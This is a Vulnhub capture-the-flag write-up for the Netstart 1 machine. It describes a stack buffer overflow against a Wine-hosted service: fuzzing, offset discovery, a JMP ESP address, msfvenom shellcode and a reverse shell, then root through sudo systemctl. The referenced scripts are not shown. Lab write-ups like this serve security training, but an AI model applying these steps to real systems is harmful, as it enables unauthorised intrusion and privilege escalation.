Vulnhub — Netstart 1 writeup
netstart is a linux machine on vulnhub which is vulnerable to buffer overflow on a wine service running on it. In this writeup we will study step-by-step exploitation of the machine and privilege escalation
First things first let’s do an nmap scan
We can see 2 open ports:
1. 21/ftp -> anonymous login allowed and there are two files present login.exe, login_support.dll
2. 2371/tcp -> It is running an application called worldwire which may be vulnerable to Buffer Overflow
Let’s start with ftp and fetch these two files:
username=anonymous, password=anonymous
Now let’s try to connect on port 2371 using netcat
It asks for a password so no luck there
Now let’s debug the files we got from ftp. So for this purpose I am using a windows 10 machine.
On running login.exe we can see:
So, now let’s start immunity debugger and attach login.exe to immunity debugger:
Now let’s try to fuzz this program and see if its crashes or not. For this purpose we will be using a python script as shown below:
We will be using the same port i.e. 2371 for this purpose
Now let’s try to find the offset. For this purpose we will use metasploit’s create pattern tool
So using this pattern we will modify our python script as follows
Now we can see which characters are present in the EIP and then will use metasploit’s pattern offset tool to find the offset
So we found 65433765 in EIP. Now in Kali Linux we will find the offset
Now we will modify our script to test that if we have found the correct offset and the script is as follows
And on running the script we get
So we can see in EIP we have 42424242 which is just hex code for four B’s. Therefore, we have controlled the EIP now let’s try to find bad characters in any
The script used will be
Now on executing this script we will see if there are any bad characters or not. Also \x00 is already removed because it is a known bad character
So it doesn’t seem like there are any bad characters. So let’s get forward to our next step and find any modules with minimum security configurations and here our second file login_support.dll will come into play. For this purpose we will use mona.py script
So we can see the first file i.e. login_support.dll is least secure and can be used for exploitation. Now let’s try to find JMP ESP addresses using the mona.py again
So we have found 2 addresses 0x625012b8 and 0x625012c5
For this machine we are using the first one i.e. 0x625012b8
Now let’s set a breakpoint at this address and run a python script to control the EIP using this address
The address written here is in reverse order because x86 architecture follows little endian format and this executable is built for an x86 architecture machine. Now, on running this script we get
Now we can see that the same address is stored in EIP so we are 90% done. Now we will create a shellcode using msfvenom and store it in C format
Now we will use this shellcode to exploit the original machine on port 2371 running the worldwire application
The script used will be
Now we will execute this script and start a listener using netcat
So now let’s try to find the user flag
So now that we have found user we will try to escalate our privileges. Firstly we will see what commands can be run by a normal user using the command shown below
So /usr/bin/systemctl can be run by a normal user as root. Let’s refer to GTFObins and see if there are any exploits available
So now lets try to run this command and see if we can escalate our privileges
Congratsss!!! We can gained root
Now let’s try to find root flag
Congratulations! You have successfully completed the netstart 1 machine
